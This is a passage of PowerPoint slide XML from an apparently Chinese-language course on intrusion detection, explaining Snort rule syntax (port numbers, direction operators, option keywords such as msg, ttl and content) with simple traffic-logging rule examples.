              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（5）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228355" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493F77AE-E7DE-45BF-A459-0BEE855FF605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>端口号：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有几种方式来指定端口号，包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>any、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>静态端口号(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>static port)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>定义、端口范围以及使用非操作定义。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>表示任意合法的端口号。静态端口号表示单个的端口号，例如：111(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>portmapper)、23(telnet)、80(http)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等。使用范围操作符:可以指定端口号范围。有几种方式来使用范围操作符:达到不同的目的，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>log udp any any -&gt; 192.168.1.0/24 1:1024  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>记录来自任何端口，其目的端口号在1到1024之间的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15528416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32AFE539-4CF4-460B-9DDF-5AE24F7C9825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（6）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229379" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D5A409-7885-40B3-9748-F2D55435E277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方向操作符(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>direction operator)：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方向操作符-&gt;表示数据包的流向。它左边是数据包的源地址和源端口，右边是目的地址和端口。此外，还有一个双向操作符&lt;&gt;,它使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对这条规则中，两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址/端口之间双向的数据传输进行记录/分析，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>POP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对话。下面的规则表示对一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对话的双向数据传输进行记录：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>log !192.168.1.0/24 any &lt;&gt; 192.168.1.0/24 23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34899711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C18B3533-6B15-4F4A-828E-2181B3F0D5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（7）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230403" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46917392-5475-48BC-B3A1-5A460D971072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则选项：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则选项构成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>入侵检测引擎的核心，它们非常容易使用，同时又很强大和容易扩展。在每条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则中，选项之间使用分号进行分割。规则选项关键词和其参数之间使用冒号分割。下面是一些常用的规则选项关键词，其中对部分重要关键词进行详细解释：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328871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92EB06D3-C8E8-4FEA-BD11-DC329670C9AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规则（8）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231427" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A732B946-AB4C-4CBA-8393-3F6DCE8EE794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="1484313"/>
            <a:ext cx="7772400" cy="5084762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  msg：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在报警和日志中打印的消息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	logto：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>把日志记录到一个用户指定的文件，而不是输出到标准的输出文件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	ttl：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>包头的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>域的值；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tos：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>包头的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>域的值；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>在包的净荷中搜索指定的样式；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	id：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分组标志符(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fragment ID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>域是否是一个特定的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	ipoption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fragbits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158184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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1EE723-BDFE-405C-9FB2-5797A8B81A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="1841500"/>
            <a:ext cx="6934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入侵方法</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入侵检测概述</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入侵检测方法与基本原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    入侵检测响应机制</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入侵检测标准化工作</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口令管理</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D8932607-9D25-4EE2-9D9B-B4654B803C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
